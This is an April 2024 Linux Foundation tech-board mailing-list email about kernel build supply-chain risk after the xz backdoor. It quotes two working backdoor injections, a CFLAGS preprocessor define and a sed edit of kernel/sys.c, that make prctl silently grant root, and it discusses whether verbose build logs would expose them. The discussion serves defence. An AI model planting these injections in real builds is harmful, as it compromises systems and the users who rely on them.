From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from smtp2.osuosl.org (smtp2.osuosl.org [140.211.166.133]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by smtp.subspace.kernel.org (Postfix) with ESMTPS id 68AEBEEAB for ; Tue, 16 Apr 2024 06:32:01 +0000 (UTC) Authentication-Results: smtp.subspace.kernel.org; arc=none smtp.client-ip=140.211.166.133 ARC-Seal:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1713249124; cv=none; b=n3f2IS5K25AhHDvZJPl6LdeRlJcLPgV7MWkTa/BoIxJiD5YOEoGU/9xFRtz2aNKH3+rxJcg/gA1g0OYh1dCCUj7ZYAiNCxgGmSYIo95dEvJ30bZQpq+8v/SqlF8P6ztw6wPKYBmXaZX0Rmjhve9F2sfHHIvef0TEXwCctSBN3fI= ARC-Message-Signature:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1713249124; c=relaxed/simple; bh=VuL3/SOsbRJWdP1hSL5pZe77No7luQgL1LVf0TV77mY=; h=From:To:Cc:Subject:In-Reply-To:References:Date:Message-ID: MIME-Version:Content-Type; b=MS9hA7ZnqRBqzwQQohaH+0+oUw8E1/wne4eTF5Jyx1mxeIo8FpkHJEsMrduAMtmf+ZsEcfvzFw0VxT4ZxBTeFZ7RNLAiDUPTJ51BMptYer4weNTqukpTwbz66PpskhYd6Af+ylK3uagPYCjG3MP5n9+6nixcwJUj9xPefk6oRGA= ARC-Authentication-Results:i=1; smtp.subspace.kernel.org; dkim=pass (2048-bit key) header.d=ellerman.id.au header.i=@ellerman.id.au header.b=lxqZG3sZ; arc=none smtp.client-ip=140.211.166.133 Authentication-Results: smtp.subspace.kernel.org; dkim=pass (2048-bit key) header.d=ellerman.id.au header.i=@ellerman.id.au header.b="lxqZG3sZ" Received: from localhost (localhost [127.0.0.1]) by smtp2.osuosl.org (Postfix) with ESMTP id C039640142 for ; Tue, 16 Apr 2024 06:32:01 +0000 (UTC) X-Virus-Scanned: amavis at osuosl.org X-Spam-Flag: NO X-Spam-Score: -4.402 X-Spam-Level: Received: from smtp2.osuosl.org ([127.0.0.1]) by localhost (smtp2.osuosl.org [127.0.0.1]) (amavis, port 10024) with ESMTP id o38-hsxiue7v for ; Tue, 16 Apr 2024 06:32:00 +0000 (UTC) X-Greylist: delayed 411 seconds by postgrey-1.37 at util1.osuosl.org; Tue, 16 Apr 2024 06:32:00 UTC DMARC-Filter: OpenDMARC Filter v1.4.2 smtp2.osuosl.org 3D727400DD Authentication-Results: smtp2.osuosl.org; dmarc=none (p=none dis=none) header.from=ellerman.id.au DKIM-Filter: OpenDKIM Filter v2.11.0 smtp2.osuosl.org 3D727400DD Authentication-Results: smtp2.osuosl.org; dkim=pass (2048-bit key, unprotected) header.d=ellerman.id.au header.i=@ellerman.id.au header.a=rsa-sha256 header.s=201909 header.b=lxqZG3sZ Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=2404:9400:2221:ea00::3; helo=gandalf.ozlabs.org; envelope-from=mpe@ellerman.id.au; receiver= Received: from gandalf.ozlabs.org (mail.ozlabs.org [IPv6:2404:9400:2221:ea00::3]) by smtp2.osuosl.org (Postfix) with ESMTPS id 3D727400DD for ; Tue, 16 Apr 2024 06:32:00 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ellerman.id.au; s=201909; t=1713248699; bh=FaCZ/3do1QU1tHoIWY0VMxkUoQtUlRnNrAdXrtvbuyg=; h=From:To:Cc:Subject:In-Reply-To:References:Date:From; b=lxqZG3sZESK647einDOKYUX7yOdhmZrMtLZVmamufmqJC98q3B/t4oqqoWKC0bOWR 2l5R8TCvhZnHMkyVq99g4iag8yZD5tRMgCdkcJWLm6pSpI/EUSLv633yg8WqJrQ8BP pq+KuBwZpW+t3BCG4UqZa3lUB3QuD/XxkE0SsR2vA9GRGFWLui+s1WeIF33n02SFWL /x/QKtwo9Mij0akbDqQje7xuFABsHMR6F5ijtmheftfn+4wWv2ek0zkDjNjn4JEo/C XI4S7oAflCvMgULi2cDWHyLTviWJlbmTKdxwXtwF5vWtgn6RFkIwFo4DMY/5WAtBbf HiI4P2DvB8M8Q== Received: from authenticated.ozlabs.org (localhost [127.0.0.1]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256) (No client certificate requested) by mail.ozlabs.org (Postfix) with ESMTPSA id 4VJYtL3M6qz4wcd; Tue, 16 Apr 2024 16:24:58 +1000 (AEST) From: Michael Ellerman To: Vegard Nossum , James Bottomley , "H. Peter Anvin" , "tech-board-discuss@lists.linuxfoundation.org" Cc: Theodore Ts'o Subject: Re: xz meltdown/Lasse Collin In-Reply-To: <872f9cfd-5c19-4a82-bf75-6256265e8f8a@oracle.com> References: <8205E91D-F15B-402D-9398-33E4FF4E4E62@zytor.com> <030a96cf36719d8a7ec702b9303616f89daed4bb.camel@HansenPartnership.com> <872f9cfd-5c19-4a82-bf75-6256265e8f8a@oracle.com> Date: Tue, 16 Apr 2024 16:24:56 +1000 Message-ID: <87zfttbz9j.fsf@mail.lhotse> Precedence: bulk X-Mailing-List: tech-board-discuss@lists.linux.dev List-Id: List-Subscribe: List-Unsubscribe: MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Vegard Nossum writes: > On 13/04/2024 15:16, James Bottomley wrote: >> 2. We need better build artifact transparency generally but =C2=A0I = think >> the kernel is fine here: we still use make so don't have the huge >> build artifact issue that allowed the exploit in and we have a >> documented signing process for our build artifacts (kernel >> tarballs). >> 3. The indirect library dependency problem doesn't apply to us. > > While this is technically true, there are many other ways to compromise > the kernel build process: > > 1) you can pass code in through the CFLAGS environment variable, one > example that I came up with together with Michael Ellerman would be: > > -DSET_ENDIAN(x,y)=3D-22,commit_creds((void*)init_task.cred) > > when building kernel/sys.c on x86, this is will turn any userspace call > of prctl(PR_SET_ENDIAN), which normally just returns -EINVAL, into a > backdoor quietly making the calling process root. > > All you need for an injection site is a preprocessor define that is > conditionally set with #ifndef FOO/#define FOO. > > This does not appear in any source file or build output directly and so > likely wouldn't get caught by SBOM-type solutions. It would appear in the build log of a V=3D1 build. Someone would still need to spot it, but at least there'd be a chance. Debian kernels seem to use KBUILD_VERBOSE=3D1 by default. Judging from the log (249MB!): https://buildd.debian.org/status/fetch.php?pkg=3Dlinux&arch=3Damd64&ver= =3D6.7.9-2&stamp=3D1710355583&raw=3D1 # CC kernel/sys.o x86_64-linux-gnu-gcc-13 -Wp,-MMD,kernel/.sys.o.d -nostdinc -I/<>/arch/x86/include -I./arch/x86/include/generated -I/<>/= include -I./include -I/<>/arch/x86/ include/uapi -I./arch/x86/include/generated/uapi -I/<>/inclu= de/uapi -I./include/generated/uapi -include /<>/include/linux/= compiler-version.h -include /<>/inc lude/linux/kconfig.h -include /<>/include/linux/compiler_typ= es.h -D__KERNEL__ -fmacro-prefix-map=3D/<>/=3D -std=3Dgnu11 -f= short-wchar -funsigned-char -fno-common -fno-PIE -fno- strict-aliasing -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-prot= ection=3Dbranch -fno-jump-tables -m64 -falign-jumps=3D1 -falign-loops=3D1 -= mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundar y=3D3 -mskip-rax-setup -mtune=3Dgeneric -mno-red-zone -mcmodel=3Dkernel -= Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=3Dthunk-= extern -mindirect-branch-register -mindirect-branch-cs-p refix -mfunction-return=3Dthunk-extern -fno-jump-tables -mharden-sls=3Dal= l -fpatchable-function-entry=3D16,16 -fno-delete-null-pointer-checks -O2 -f= no-allow-store-data-races -fstack-protector-strong -ft rivial-auto-var-init=3Dzero -fno-stack-clash-protection -pg -mrecord-mcou= nt -mfentry -DCC_USING_FENTRY -falign-functions=3D16 -fstrict-flex-arrays= =3D3 -fno-strict-overflow -fno-stack-check -fconserve-st ack -Wall -Wundef -Werror=3Dimplicit-function-declaration -Werror=3Dimpli= cit-int -Werror=3Dreturn-type -Werror=3Dstrict-prototypes -Wno-format-secur= ity -Wno-trigraphs -Wno-frame-address -Wno-address-of-pa cked-member -Wframe-larger-than=3D2048 -Wno-main -Wno-unused-but-set-vari= able -Wno-unused-const-variable -Wno-dangling-pointer -Wvla -Wno-pointer-si= gn -Wcast-function-type -Wno-array-bounds -Wno-all oc-size-larger-than -Wimplicit-fallthrough=3D5 -Werror=3Ddate-time -Werro= r=3Dincompatible-pointer-types -Werror=3Ddesignated-init -Wenum-conversion = -Wno-unused-but-set-variable -Wno-unused-const-variable -Wno-restrict -Wno-packed-not-aligned -Wno-format-overflow -Wno-format-tr= uncation -Wno-stringop-overflow -Wno-stringop-truncation -Wno-missing-field= -initializers -Wno-type-limits -Wno-shift-negati ve-value -Wno-maybe-uninitialized -Wno-sign-compare -g -fdebug-prefix-map= =3D/<>/=3D -I /<>/kernel -I ./kernel -DKBUILD_= MODFILE=3D'"kernel/sys"' -DKBUILD_BASENAME=3D'"sys"' -DK BUILD_MODNAME=3D'"sys"' -D__KBUILD_MODNAME=3Dkmod_sys -c -o kernel/sys.o = /<>/kernel/sys.c Though obviously that just motivates an attacker to inject their payload via some other mechanism, eg. by modifying the source eariler in the build: $ sed -i -e "s/SET_ENDIAN(me, arg2)/-22;commit_creds((void*)init_task.cred= )/" kernel/sys.c On the other hand it looks like Fedora kernels are not built with V=3D1. Just looking at the log (search for '-j48 bzImage'): https://kojipkgs.fedoraproject.org//packages/kernel/6.8.5/301.fc40/data/l= ogs/x86_64/build.log cheers